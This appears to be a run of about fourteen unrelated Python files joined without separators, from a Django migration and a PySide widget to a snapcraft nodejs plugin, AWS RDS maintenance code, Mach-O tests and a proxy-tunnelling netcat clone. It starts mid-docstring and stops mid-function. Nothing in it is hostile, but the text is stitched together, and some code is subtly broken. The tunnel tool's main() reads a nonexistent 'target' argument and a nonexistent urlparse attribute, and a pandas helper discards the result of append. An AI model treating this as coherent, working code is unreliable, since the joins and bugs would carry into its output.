CHUNK_SIZE) @type fill_size: C{bool} @param fill_size: If True, make sure chunks are chunk_size in length (except for last chunk). TODO: At some point in the future we could use byte arrays here if version >= Python 3. This should speed things up a bit and reduce memory usage. """ chunk_size = chunk_size or CHUNK_SIZE if isinstance(iterator, (file, httplib.HTTPResponse)): get_data = iterator.read args = (chunk_size, ) else: get_data = next args = (iterator, ) data = b('') empty = False while not empty or len(data) > 0: if not empty: try: chunk = b(get_data(*args)) if len(chunk) > 0: data += chunk else: empty = True except StopIteration: empty = True if len(data) == 0: raise StopIteration if fill_size: if empty or len(data) >= chunk_size: yield data[:chunk_size] data = data[chunk_size:] else: yield data data = b('') def exhaust_iterator(iterator): """ Exhaust an iterator and return all data returned by it. @type iterator: C{Iterator} @param response: An object which implements an iterator interface or a File like object with read method. @rtype C{str} @return Data returned by the iterator. """ data = b('') try: chunk = b(next(iterator)) except StopIteration: chunk = b('') while len(chunk) > 0: data += chunk try: chunk = b(next(iterator)) except StopIteration: chunk = b('') return data def guess_file_mime_type(file_path): filename = os.path.basename(file_path) (mimetype, encoding) = mimetypes.guess_type(filename) return mimetype, encoding # Generated by Django 3.1.11 on 2021-09-09 14:18 from django.conf import settings from django.db import migrations, models import django.db.models.deletion class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('termsofuse', '0001_initial'), ] operations = [ migrations.CreateModel( name='TermsOfUseSignature', fields=[ ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), ('created', models.DateTimeField(auto_now_add=True)), ], ), migrations.RemoveField( model_name='termsofusedocument', name='is_active', ), migrations.RemoveField( model_name='termsofusedocument', name='updated', ), migrations.DeleteModel( name='TermsOfUsePeriod', ), migrations.AddField( model_name='termsofusesignature', name='document', field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='signatures', to='termsofuse.termsofusedocument'), ), migrations.AddField( model_name='termsofusesignature', name='user', field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='signatures', to=settings.AUTH_USER_MODEL), ), ] from PySide6.QtWidgets import QFrame, QGridLayout, QLabel, QLineEdit, QWidget from PySide6.QtGui import QIcon from PySide6.QtCore import Qt from data import Data from utils import validators class AutoCroppingRelative(QFrame): """ A widget for parameters selection for automatic relative cropping method. Relative cropping means that user inputs how many relative data units should be cut off of each of the sides. """ def __init__(self, parent: QWidget = None) -> None: """ The constructor for auto relative cropping parameters selection widget. Parameters: parent (QWidget): Parent widget of this widget. Default: None. """ super().__init__(parent) self.setObjectName("method_instance") self.icon = QIcon("icons/cut.svg") # inputs self.init_inputs_value = 0 self.from_start = QLineEdit(str(self.init_inputs_value), validator=validators.POSITIVE_INT_VALIDATOR) self.from_end = QLineEdit(str(self.init_inputs_value), validator=validators.POSITIVE_INT_VALIDATOR) # put widgets into layout layout = QGridLayout() layout.addWidget(QLabel("Spectral Plot Cropping - Relative"), 0, 0) layout.addWidget(QLabel("Data Points to Crop (Beginning)"), 1, 0) layout.addWidget(self.from_start, 1, 1) layout.addWidget(QLabel("Data Points to Crop (End)"), 2, 0) layout.addWidget(self.from_end, 2, 1) layout.setColumnStretch(layout.columnCount(), 1) layout.setAlignment(Qt.AlignVCenter) self.setLayout(layout) def get_params(self) -> tuple[int, int]: """ A function to return parameters of the method with the correct types. Returns: parameters (tuple): Tuple of method's parameters. """ parameters = (int(self.from_start.text()), int(self.from_end.text()), ) return parameters def params_to_text(self) -> str: """ A function to return parameters as strings with corresponding meanings. Returns: str_parameters (str): String of parameters and their meaning. """ str_parameters = f"crop from start: {int(self.from_start.text())}, crop from end: {int(self.from_end.text())}" return str_parameters def function_name(self) -> str: """ A function to return name of the function that this widget represents. Returns: function_name (str): Name of the function that the parameters from this widget are for. """ return Data.auto_crop_relative.__name__ def get_string_name(self) -> str: """ A function to return name of this widget as a string. Returns: widget_name (str): Name of the widget so that it can be recognized by the user. """ return "Cropping - Relative" import sys import logging import argparse import gevent from urllib.parse import urlparse from gevent.socket import create_connection from ._tools import (LOG_LEVEL, nc_forward_stdin, nc_forward_stdout, get_krb_token, proxy_host_from_env, proxy_port_from_env) def netcat(host, port, proxy_host, proxy_port, verbose): logger = logging.getLogger() formatter = logging.Formatter('%(asctime)s %(levelname)-8s %(message)s') handler = logging.StreamHandler() handler.setFormatter(formatter) logger.addHandler(handler) verbose = 0 if verbose <= 0 else 1 if verbose: logger.setLevel(LOG_LEVEL[verbose]) else: logging.disable(LOG_LEVEL[0]) request = bytearray( b'CONNECT %b:%d HTTP/1.1' % (host.encode(), port) + b'\r\n' + b'Host: %b:%d' % (proxy_host.encode(), proxy_port) + b'\r\n' + b'Proxy-Connection: Keep-Alive' ) dst = create_connection((proxy_host, proxy_port)) dst.sendall(request) data = bytearray() while True: data.extend(dst.recv(1024)) if b'\r\n\r\n' in data: break if b'200 Connection established' not in data and b'407' in data: krb_token = get_krb_token(proxy_host) request.extend(b'\r\n' + b'Proxy-Authorization: Negotiate %b' % krb_token) try: dst.sendall(request) except: # if proxy does not support Keep-Alive dst.close() dst = create_connection((proxy_host, proxy_port)) dst.sendall(request) data = bytearray() while True: data.extend(dst.recv(1024)) if b'\r\n\r\n' in data: break if b'200 Connection established' in data: logging.info('Proxy connection established\n') data = data.split(b'\r\n\r\n', 1)[1] if data: dst.sendall(data) forwarders = (gevent.spawn(nc_forward_stdin, dst), gevent.spawn(nc_forward_stdout, dst)) gevent.joinall(forwarders) elif b'407' in data: logging.info('Proxy authentication failed\n') else: version, status_code, status_message = ( data.split(b'\r\n', 1)[0].split(b' ', 2) ) logging.info(f'Proxy returned {status_code} {status_message}\n') def main(): default_proxy = "{}:{}".format(proxy_host_from_env(), proxy_port_from_env()) parser = argparse.ArgumentParser( description='A thin netcat-like implementation that handles Proxy ' 'Authentication for applications that cannot do so on their' 'own.') parser.add_argument('host', metavar='TARGET:PORT', help='Hostname or IP to tunnel a connection to. ' 'Provide in format of hostname:port') parser.add_argument('proxy', metavar='PROXY:PORT', nargs="?", default=default_proxy, help='Address/hostname of the proxy and port. ' 'Provide in format hostname:port') parser.add_argument('-v', '--verbose', action='count', default=0, help="Add verbose output") args = parser.parse_args() host, port = urlparse(args.target).host, urlparse(args.target).port proxy_host, proxy_port = urlparse(args.proxy).host, urlparse(args.proxy).port try: netcat(host, port, proxy_host, proxy_port, args.verbose) except KeyboardInterrupt: sys.exit("Closing down") 10-100 from datetime import datetime import time import cv2 def webcam_record(src=0, output_path=None): """ Record video from a video capture source and write to .mp4 file. Output FPS is equal to average FPS over the duration of the recording. """ if output_path is None: output_path = datetime.now().strftime("%Y%m%d%H%M%s.mp4") if not output_path.endswith(".mp4"): output_path += ".mp4" cap = cv2.VideoCapture(src) assert cap.isOpened(), "VideoCapture not opened" frames = [] start_time = time.time() while True: grabbed, frame = cap.read() if not grabbed: break frames.append(frame) cv2.imshow("Stream", frame) if cv2.waitKey(1) == ord("q"): break end_time = time.time() cap.release() assert frames, "No frames captured" average_fps = int(1 / ((end_time - start_time) / len(frames))) h, w = frames[0].shape[:2] writer = cv2.VideoWriter( output_path, cv2.VideoWriter_fourcc(*"mp4v"), average_fps, (w, h) ) for frame in frames: writer.write(frame) writer.release() 100-1000 from __future__ import unicode_literals from __future__ import absolute_import from django.conf import settings from django.db import models from .. import exc from .circuit import Circuit from .resource import Resource class Device(Resource): """Represents a network device.""" hostname = models.CharField( max_length=255, null=False, db_index=True, help_text='The hostname of the Device.' ) site = models.ForeignKey( 'Site', db_index=True, related_name='devices', on_delete=models.PROTECT, verbose_name='Site', help_text='Unique ID of the Site this Device is under.' ) def __unicode__(self): return u'%s' % self.hostname class Meta: unique_together = ('site', 'hostname') index_together = unique_together @property def circuits(self): """All circuits related to this Device.""" interfaces = self.interfaces.all() circuits = [] for intf in interfaces: try: circuits.append(intf.circuit) except Circuit.DoesNotExist: continue return circuits def clean_hostname(self, value): if not value: raise exc.ValidationError({ 'hostname': 'Hostname must be non-zero length string.' }) if not settings.DEVICE_NAME.match(value): raise exc.ValidationError({ 'name': 'Invalid name: %r.' % value }) return value def clean_fields(self, exclude=None): self.hostname = self.clean_hostname(self.hostname) def save(self, *args, **kwargs): self.full_clean() super(Device, self).save(*args, **kwargs) def to_dict(self): return { 'id': self.id, 'site_id': self.site_id, 'hostname': self.hostname, 'attributes': self.get_attributes(), } # -*- Mode:Python; indent-tabs-mode:nil; tab-width:4 -*- # # Modified by on 2018-10-01 to add support for ppc64el and s390x # # Copyright (C) 2015-2017 Canonical Ltd # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License version 3 as # published by the Free Software Foundation. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see . """The nodejs plugin is useful for node/npm based parts. The plugin uses node to install dependencies from `package.json`. It also sets up binaries defined in `package.json` into the `PATH`. This plugin uses the common plugin keywords as well as those for "sources". For more information check the 'plugins' topic for the former and the 'sources' topic for the latter. Additionally, this plugin uses the following plugin-specific keywords: - node-packages: (list) A list of dependencies to fetch using npm. - node-engine: (string) The version of nodejs you want the snap to run on. - npm-run: (list) A list of targets to `npm run`. These targets will be run in order, after `npm install` - npm-flags: (list) A list of flags for npm. - node-package-manager (string; default: npm) The language package manager to use to drive installation of node packages. Can be either `npm` (default) or `yarn`. """ import collections import contextlib import json import logging import os import shutil import subprocess import sys import snapcraft from snapcraft import sources from snapcraft.file_utils import link_or_copy_tree from snapcraft.internal import errors logger = logging.getLogger(__name__) _NODEJS_BASE = "node-v{version}-linux-{arch}" _NODEJS_VERSION = "12.18.3" _NODEJS_TMPL = "https://nodejs.org/dist/v{version}/{base}.tar.gz" _NODEJS_ARCHES = {"i386": "x86", "amd64": "x64", "armhf": "armv7l", "arm64": "arm64", "ppc64el": "ppc64le", "s390x": "s390x"} _YARN_URL = "https://yarnpkg.com/latest.tar.gz" class NodePlugin(snapcraft.BasePlugin): @classmethod def schema(cls): schema = super().schema() schema["properties"]["node-packages"] = { "type": "array", "minitems": 1, "uniqueItems": True, "items": {"type": "string"}, "default": [], } schema["properties"]["node-engine"] = { "type": "string", "default": _NODEJS_VERSION, } schema["properties"]["node-package-manager"] = { "type": "string", "default": "npm", "enum": ["npm", "yarn"], } schema["properties"]["npm-run"] = { "type": "array", "minitems": 1, "uniqueItems": False, "items": {"type": "string"}, "default": [], } schema["properties"]["npm-flags"] = { "type": "array", "minitems": 1, "uniqueItems": False, "items": {"type": "string"}, "default": [], } if "required" in schema: del schema["required"] return schema @classmethod def get_build_properties(cls): # Inform Snapcraft of the properties associated with building. If these # change in the YAML Snapcraft will consider the build step dirty. return ["node-packages", "npm-run", "npm-flags"] @classmethod def get_pull_properties(cls): # Inform Snapcraft of the properties associated with pulling. If these # change in the YAML Snapcraft will consider the build step dirty. return ["node-engine", "node-package-manager"] @property def _nodejs_tar(self): if self._nodejs_tar_handle is None: self._nodejs_tar_handle = sources.Tar( self._nodejs_release_uri, self._npm_dir ) return self._nodejs_tar_handle @property def _yarn_tar(self): if self._yarn_tar_handle is None: self._yarn_tar_handle = sources.Tar(_YARN_URL, self._npm_dir) return self._yarn_tar_handle def __init__(self, name, options, project): super().__init__(name, options, project) self._source_package_json = os.path.join( os.path.abspath(self.options.source), "package.json" ) self._npm_dir = os.path.join(self.partdir, "npm") self._manifest = collections.OrderedDict() self._nodejs_release_uri = get_nodejs_release( self.options.node_engine, self.project.deb_arch ) self._nodejs_tar_handle = None self._yarn_tar_handle = None def pull(self): super().pull() os.makedirs(self._npm_dir, exist_ok=True) self._nodejs_tar.download() if self.options.node_package_manager == "yarn": self._yarn_tar.download() # do the install in the pull phase to download all dependencies. if self.options.node_package_manager == "npm": self._npm_install(rootdir=self.sourcedir) else: self._yarn_install(rootdir=self.sourcedir) def clean_pull(self): super().clean_pull() # Remove the npm directory (if any) if os.path.exists(self._npm_dir): shutil.rmtree(self._npm_dir) def build(self): super().build() if self.options.node_package_manager == "npm": installed_node_packages = self._npm_install(rootdir=self.builddir) # Copy the content of the symlink to the build directory # LP: #1702661 modules_dir = os.path.join(self.installdir, "lib", "node_modules") _copy_symlinked_content(modules_dir) else: installed_node_packages = self._yarn_install(rootdir=self.builddir) lock_file_path = os.path.join(self.sourcedir, "yarn.lock") if os.path.isfile(lock_file_path): with open(lock_file_path) as lock_file: self._manifest["yarn-lock-contents"] = lock_file.read() self._manifest["node-packages"] = [ "{}={}".format(name, installed_node_packages[name]) for name in installed_node_packages ] def _npm_install(self, rootdir): self._nodejs_tar.provision( self.installdir, clean_target=False, keep_tarball=True ) npm_cmd = ["npm"] + self.options.npm_flags npm_install = npm_cmd + ["--cache-min=Infinity", "install"] for pkg in self.options.node_packages: self.run(npm_install + ["--global"] + [pkg], cwd=rootdir) if os.path.exists(os.path.join(rootdir, "package.json")): self.run(npm_install, cwd=rootdir) self.run(npm_install + ["--global"], cwd=rootdir) for target in self.options.npm_run: self.run(npm_cmd + ["run", target], cwd=rootdir) return self._get_installed_node_packages("npm", self.installdir) def _yarn_install(self, rootdir): self._nodejs_tar.provision( self.installdir, clean_target=False, keep_tarball=True ) self._yarn_tar.provision(self._npm_dir, clean_target=False, keep_tarball=True) yarn_cmd = [os.path.join(self._npm_dir, "bin", "yarn")] yarn_cmd.extend(self.options.npm_flags) if "http_proxy" in os.environ: yarn_cmd.extend(["--proxy", os.environ["http_proxy"]]) if "https_proxy" in os.environ: yarn_cmd.extend(["--https-proxy", os.environ["https_proxy"]]) flags = [] if rootdir == self.builddir: yarn_add = yarn_cmd + ["global", "add"] flags.extend( [ "--offline", "--prod", "--global-folder", self.installdir, "--prefix", self.installdir, ] ) else: yarn_add = yarn_cmd + ["add"] for pkg in self.options.node_packages: self.run(yarn_add + [pkg] + flags, cwd=rootdir) # local packages need to be added as if they were remote, we # remove the local package.json so `yarn add` doesn't pollute it. if os.path.exists(self._source_package_json): with contextlib.suppress(FileNotFoundError): os.unlink(os.path.join(rootdir, "package.json")) shutil.copy( self._source_package_json, os.path.join(rootdir, "package.json") ) self.run(yarn_add + ["file:{}".format(rootdir)] + flags, cwd=rootdir) # npm run would require to bring back package.json if self.options.npm_run and os.path.exists(self._source_package_json): # The current package.json is the yarn prefilled one. with contextlib.suppress(FileNotFoundError): os.unlink(os.path.join(rootdir, "package.json")) os.link(self._source_package_json, os.path.join(rootdir, "package.json")) for target in self.options.npm_run: self.run( yarn_cmd + ["run", target], cwd=rootdir, env=self._build_environment(rootdir), ) return self._get_installed_node_packages("npm", self.installdir) def _get_installed_node_packages(self, package_manager, cwd): try: output = self.run_output( [package_manager, "ls", "--global", "--json"], cwd=cwd ) except subprocess.CalledProcessError as error: # XXX When dependencies have missing dependencies, an error like # this is printed to stderr: # npm ERR! peer dep missing: glob@*, required by glob-promise@3.1.0 # retcode is not 0, which raises an exception. output = error.output.decode(sys.getfilesystemencoding()).strip() packages = collections.OrderedDict() dependencies = json.loads(output, object_pairs_hook=collections.OrderedDict)[ "dependencies" ] while dependencies: key, value = dependencies.popitem(last=False) # XXX Just as above, dependencies without version are the ones # missing. if "version" in value: packages[key] = value["version"] if "dependencies" in value: dependencies.update(value["dependencies"]) return packages def get_manifest(self): return self._manifest def _build_environment(self, rootdir): env = os.environ.copy() if rootdir.endswith("src"): hidden_path = os.path.join(rootdir, "node_modules", ".bin") if env.get("PATH"): new_path = "{}:{}".format(hidden_path, env.get("PATH")) else: new_path = hidden_path env["PATH"] = new_path return env def _get_nodejs_base(node_engine, machine): if machine not in _NODEJS_ARCHES: raise errors.SnapcraftEnvironmentError( "architecture not supported ({})".format(machine) ) return _NODEJS_BASE.format(version=node_engine, arch=_NODEJS_ARCHES[machine]) def get_nodejs_release(node_engine, arch): return _NODEJS_TMPL.format( version=node_engine, base=_get_nodejs_base(node_engine, arch) ) def _copy_symlinked_content(modules_dir): """Copy symlinked content. When running newer versions of npm, symlinks to the local tree are created from the part's installdir to the root of the builddir of the part (this only affects some build configurations in some projects) which is valid when running from the context of the part but invalid as soon as the artifacts migrate across the steps, i.e.; stage and prime. If modules_dir does not exist we simply return. """ if not os.path.exists(modules_dir): return modules = [os.path.join(modules_dir, d) for d in os.listdir(modules_dir)] symlinks = [l for l in modules if os.path.islink(l)] for link_path in symlinks: link_target = os.path.realpath(link_path) os.unlink(link_path) link_or_copy_tree(link_target, link_path) algorithms/0056_merge_intervals.py0 class Solution: # time: O(nlogn) # space: O(n) def merge(self, intervals: list[list[int]]) -> list[list[int]]: intervals.sort() result = [intervals[0]] for interval in intervals: if interval[0] <= result[-1][1]: result[-1][1] = max(result[-1][1], interval[1]) else: result.append(interval) return result kimvwijnen/segm-fine-tuning #!/usr/bin/env python # -*- coding: utf-8 -*- # # Copyright 2017 Division of Medical Image Computing, German Cancer Research Center (DKFZ) # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os from trixi.util import Config def get_config(): dataset = 'atrial' # TODO dataset = 'atrial' (for training the atrial on 5 images) fine_tune = 'None' # TODO (no freezing, training whole network from scratch) download_data_from_drive = True # TODO after running once, change to False # dataset = 'brats' # TODO uncomment # TODO with 3 fine tuning options, uncomment sequentially: # fine_tune = 'None' # (no freezing, training whole network) # fine_tune = 'expanding_all' # (for freezing contracting/left path, training expanding/right path) # fine_tune = 'expanding_plus1' # (for freezing the first bit of contracting path, training bottom part and expanding path) if dataset == 'atrial': checkpoint_dir = '' # leave empty to train from scratch for atrial segmentation (on 5 samples) checkpoint_filename = '' exp_name = 'train_from_scratch_heart' elif dataset == 'brats': checkpoint_dir = './output_experiment/[dir_brats_exp]/checkpoint/' # TODO add name of directory with model checkpoint_filename = 'checkpoint_last.pth.tar' exp_name = 'brats_for_atrialsegm_finetune_' + 'all_layers' if fine_tune=='None' else fine_tune else: raise ValueError('No config settings for this dataset') c = get_config_heart(fine_tune_type=fine_tune, exp_name=exp_name, checkpoint_filename=checkpoint_filename, checkpoint_dir=checkpoint_dir, nr_train_samples=5, download_data_from_drive=download_data_from_drive) # training on 5 images (if want to use original split use train_samples=0 instead of train_samples=5 print(c) return c def get_config_heart(fine_tune_type='None', exp_name='', checkpoint_filename='', checkpoint_dir='', nr_train_samples=0, download_data_from_drive=False): # Set your own path, if needed. data_root_dir = os.path.abspath('data') # The path where the downloaded dataset is stored. c = Config( update_from_argv=True, # Train parameters num_classes=2, in_channels=1, batch_size=8, patch_size=256, n_epochs=60, learning_rate=0.0002, fold=0, # The 'splits.pkl' may contain multiple folds. Here we choose which one we want to use. device="cuda", # 'cuda' is the default CUDA device, you can use also 'cpu'. For more information, see https://pytorch.org/docs/stable/notes/cuda.html # Logging parameters name=exp_name, author='maxi', # Author of this project plot_freq=10, # How often should stuff be shown in visdom append_rnd_string=False, start_visdom=False, do_instancenorm=True, # Defines whether or not the UNet does a instance normalization in the contracting path do_load_checkpoint=True, checkpoint_filename=checkpoint_filename, checkpoint_dir=checkpoint_dir, fine_tune=fine_tune_type, # Adapt to your own path, if needed. download_data=download_data_from_drive, google_drive_id='1RzPB1_bqzQhlWvU-', dataset_name='Task02_Heart', base_dir=os.path.abspath('output_experiment'), # Where to log the output of the experiment. data_root_dir=data_root_dir, # The path where the downloaded dataset is stored. data_dir=os.path.join(data_root_dir, 'Task02_Heart/preprocessed'), # This is where your training and validation data is stored data_test_dir=os.path.join(data_root_dir, 'Task02_Heart/preprocessed'), # This is where your test data is stored split_dir=os.path.join(data_root_dir, 'Task02_Heart'), # This is where the 'splits.pkl' file is located, that holds your splits. train_samples=nr_train_samples, # This is the amount of samples used in the train set. Use 0 for original split (1/2 train, 1/4 val, 1/4 test) # The validation set will be the same size, and the test set is the rest of the images # Testing visualize_segm=True ) print(c) return c """ retrieves upcoming maintenance windows for RDS clusters and instances. """ from typing import Optional, Dict, Tuple from datetime import datetime import boto3 from mypy_boto3_rds import RDSClient from aws_maintenance_window_reporter.maintenance_action import MaintenanceAction from aws_maintenance_window_reporter.aws_maintenance_window import ( next_maintenance_window, ) def get_pending_maintenance_actions( session: boto3.session.Session, ) -> [MaintenanceAction]: """ gets a list of pending maintenance actions on RDS clusters and instances """ result = [] client = session.client("rds") for response in client.get_paginator("describe_db_instances").paginate(): for instance in response["DBInstances"]: if instance.get("PendingModifiedValues"): arn = instance["DBInstanceArn"] result.append( _create_maintenance_action_from_rds_arn( arn, None, "Pending modified values" ) ) for response in client.get_paginator("describe_db_clusters").paginate(): for cluster in response["DBClusters"]: arn = cluster["DBClusterArn"] not_before, _ = get_next_maintenance_window_of_resource(client, arn) if cluster.get("PendingModifiedValues"): result.append( _create_maintenance_action_from_rds_arn( arn, None, "Pending modified values" ) ) for response in client.get_paginator( "describe_pending_maintenance_actions" ).paginate(): for action in response["PendingMaintenanceActions"]: details = action["PendingMaintenanceActionDetails"] apply_dates = sorted( map( lambda d: d["CurrentApplyDate"], filter(lambda d: "CurrentApplyDate" in d, details), ) ) not_before = apply_dates[0] if apply_dates else None description = "; ".join( map( lambda d: d["Description"], details, ) ) result.append( _create_maintenance_action_from_rds_arn( action["ResourceIdentifier"], not_before, description ) ) return result def _create_maintenance_action_from_rds_arn( arn: str, not_before: Optional[datetime], description: Optional[str] ) -> MaintenanceAction: """ creates a MaintenanceAction from an RDS ARN. The resource type is set to the associated DataDog tag for the respective resource type. """ rds_resource_type_to_datadog_tag = { "db": "dbinstanceidentifier", "cluster": "dbclusteridentifier", } resource_id = arn.split(":")[-1] resource_type = arn.split(":")[-2] return MaintenanceAction( resource_id, rds_resource_type_to_datadog_tag.get(resource_type, resource_type), "rds", not_before, description, ) # cached maintenance windows per ARN _cache: Dict[str, Tuple[datetime, datetime]] = {} def get_next_maintenance_window_of_resource( rds: RDSClient, arn: str ) -> (datetime, datetime): """ returns the next maintenance window for the RDS resource specified with by `arn`. The result is stored in a cache. Subsequent calls will return the previously cached value """ if arn not in _cache: if ":cluster:" in arn: response = rds.describe_db_clusters(DBClusterIdentifier=arn) window = response["DBClusters"][0]["PreferredMaintenanceWindow"] else: response = rds.describe_db_instances(DBInstanceIdentifier=arn) window = response["DBInstances"][0]["PreferredMaintenanceWindow"] _cache[arn] = next_maintenance_window(window, datetime.utcnow()) return _cache[arn] lang_codes = { 19: "Arabic", 22: "Bengali", 14: "Bulgarian", 37: "Burmese", 33: "Catalan", 21: "Chinese (Simp)", 35: "Chinese (Trad)", 24: "Czech", 20: "Danish", 5: "Dutch", 1: "English", 34: "Filipino", 11: "Finnish", 10: "French", 8: "German", 13: "Greek", 39: "Hebrew", 40: "Hindi", 9: "Hungarian", 27: "Indonesian", 6: "Italian", 2: "Japanese", 28: "Korean", 38: "Lithuanian", 31: "Malay", 25: "Mongolian", 42: "Norwegian", 41: "Other", 30: "Persian", 3: "Polish", 16: "Portuguese (Br)", 17: "Portuguese (Pt)", 23: "Romanian", 7: "Russian" , 4: "Serbo-Croatian", 15: "Spanish (Es)", 29: "Spanish (LATAM)", 18: "Swedish", 32: "Thai", 26: "Turkish", 36: "Ukrainian", 12: "Vietnamese" } class Language: """ A class with a bunch of class methods to aid with finding a chapter in the desired language. """ def __init__(self, code, scdry=None): self._lang_code = code self._scdry = scdry def __eq__(self, other): if other in (self._lang_code, self._scdry): return True return False @classmethod def English(cls): return cls('gb') @classmethod def NoLang(cls): return cls('') @classmethod def German(cls): return cls('de') @classmethod def French(cls): return cls('fr') @classmethod def Dutch(cls): return cls('nl') @classmethod def Spanish(cls): return cls('es', 'mx') @classmethod def Mexican(cls): return cls('es', 'mx')machotools/tests/test_detect.py import unittest from machotools.detect import is_macho, is_dylib, is_executable, is_bundle from machotools.tests.common import ( FOO_DYLIB, SIMPLE_MAIN, SIMPLE_BUNDLE, NO_MACHO_FILE, TINY_FILE ) class TestDetect(unittest.TestCase): def test_tiny_file(self): self.assertFalse(is_macho(TINY_FILE)) def test_dylib(self): self.assertTrue(is_dylib(FOO_DYLIB)) self.assertFalse(is_bundle(FOO_DYLIB)) self.assertFalse(is_executable(FOO_DYLIB)) def test_bundle(self): self.assertFalse(is_dylib(SIMPLE_BUNDLE)) self.assertTrue(is_bundle(SIMPLE_BUNDLE)) self.assertFalse(is_executable(SIMPLE_BUNDLE)) def test_executable(self): self.assertFalse(is_dylib(SIMPLE_MAIN)) self.assertFalse(is_bundle(SIMPLE_MAIN)) self.assertTrue(is_executable(SIMPLE_MAIN)) def test_no_macho(self): self.assertFalse(is_dylib(NO_MACHO_FILE)) self.assertFalse(is_bundle(NO_MACHO_FILE)) self.assertFalse(is_executable(NO_MACHO_FILE)) def test_is_macho(self): self.assertTrue(is_macho(FOO_DYLIB)) self.assertTrue(is_macho(SIMPLE_MAIN)) self.assertTrue(is_macho(SIMPLE_BUNDLE)) self.assertFalse(is_macho(NO_MACHO_FILE)) #!/usr/bin/env python3 # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved. import logging import os import pprint import unittest import uuid import numpy as np import pytest import pytorch_lightning as pl import torch from parameterized import parameterized from reagent.gym.agents.agent import Agent from reagent.gym.datasets.replay_buffer_dataset import OfflineReplayBufferDataset from reagent.gym.envs import Gym from reagent.gym.policies.random_policies import make_random_policy_for_env from reagent.gym.runners.gymrunner import evaluate_for_n_episodes from reagent.gym.utils import build_normalizer, fill_replay_buffer from reagent.model_managers.union import ModelManager__Union from reagent.replay_memory.circular_replay_buffer import ReplayBuffer from reagent.test.base.horizon_test_base import HorizonTestBase from reagent.workflow.types import RewardOptions # for seeding the environment SEED = 0 logger = logging.getLogger(__name__) logger.setLevel(logging.INFO) """ These are trained offline. """ GYM_TESTS = [ ("CEM Cartpole", "configs/world_model/cem_cartpole_offline.yaml"), ( "CEM Single World Model Linear Dynamics", "configs/world_model/cem_single_world_model_linear_dynamics_offline.yaml", ), ( "CEM Many World Models Linear Dynamics", "configs/world_model/cem_many_world_models_linear_dynamics_offline.yaml", ), ] curr_dir = os.path.dirname(__file__) class TestGymOffline(HorizonTestBase): # pyre-fixme[16]: Module `parameterized` has no attribute `expand`. @parameterized.expand(GYM_TESTS) def test_gym_offline_cpu(self, name: str, config_path: str): self.run_from_config( run_test=run_test_offline, config_path=os.path.join(curr_dir, config_path), use_gpu=False, ) logger.info(f"{name} passes!") # pyre-fixme[16]: Module `parameterized` has no attribute `expand`. @parameterized.expand(GYM_TESTS) @pytest.mark.serial @unittest.skipIf(not torch.cuda.is_available(), "CUDA not available") def test_gym_offline_gpu(self, name: str, config_path: str): self.run_from_config( run_test=run_test_offline, config_path=os.path.join(curr_dir, config_path), use_gpu=True, ) logger.info(f"{name} passes!") def evaluate_cem(env, manager, trainer_module, num_eval_episodes: int): # NOTE: for CEM, serving isn't implemented policy = manager.create_policy(trainer_module, serving=False) agent = Agent.create_for_env(env, policy) return evaluate_for_n_episodes( n=num_eval_episodes, env=env, agent=agent, max_steps=env.max_steps ) def identity_collate(batch): assert isinstance(batch, list) and len(batch) == 1, f"Got {batch}" return batch[0] def run_test_offline( env_name: str, model: ModelManager__Union, replay_memory_size: int, num_batches_per_epoch: int, num_train_epochs: int, passing_score_bar: float, num_eval_episodes: int, minibatch_size: int, use_gpu: bool, ): env = Gym(env_name=env_name) env.seed(SEED) env.action_space.seed(SEED) normalization = build_normalizer(env) logger.info(f"Normalization is: \n{pprint.pformat(normalization)}") manager = model.value trainer = manager.build_trainer( use_gpu=use_gpu, reward_options=RewardOptions(), normalization_data_map=normalization, ) # first fill the replay buffer to burn_in replay_buffer = ReplayBuffer( replay_capacity=replay_memory_size, batch_size=minibatch_size ) # always fill full RB random_policy = make_random_policy_for_env(env) agent = Agent.create_for_env(env, policy=random_policy) fill_replay_buffer( env=env, replay_buffer=replay_buffer, desired_size=replay_memory_size, agent=agent, ) device = torch.device("cuda") if use_gpu else None dataset = OfflineReplayBufferDataset.create_for_trainer( trainer, env, replay_buffer, batch_size=minibatch_size, num_batches=num_batches_per_epoch, device=device, ) data_loader = torch.utils.data.DataLoader(dataset, collate_fn=identity_collate) pl_trainer = pl.Trainer( max_epochs=num_train_epochs, gpus=int(use_gpu), deterministic=True, default_root_dir=f"lightning_log_{str(uuid.uuid4())}", ) pl_trainer.fit(trainer, data_loader) logger.info(f"Evaluating after training for {num_train_epochs} epochs: ") eval_rewards = evaluate_cem(env, manager, trainer, num_eval_episodes) mean_rewards = np.mean(eval_rewards) assert ( mean_rewards >= passing_score_bar ), f"{mean_rewards} doesn't pass the bar {passing_score_bar}." if __name__ == "__main__": unittest.main() import numpy as np import pandas as pd from libreco.data import split_by_ratio_chrono, DatasetFeat from libreco.algorithms import YouTubeRanking # remove unnecessary tensorflow logging import os import tensorflow as tf os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3' os.environ["KMP_WARNINGS"] = "FALSE" tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR) ### PARAMETERS embed_size = 300 n_epochs = 20 lr = 1e-4 batch_size = 512 hidden_units = "128,64,32" ### FUNCTIONS def split_train_test_by_windowid(df, test_size = 0.2): first_time = True for windowid in df['WindowID'].unique(): if first_time: test_df = df.groupby('WindowID').get_group(windowid).sample(frac = test_size) first_time = False else: test_df.append(df.groupby('WindowID').get_group(windowid).sample(frac = test_size)) train_df = df.drop(test_df.index) return train_df, test_df def generate_recommendation_output(user_list, job_list, output_dir): output_dict = {} for i, user in enumerate(user_list): if user not in output_dict: output_dict[user] = [job_list[i]] else: 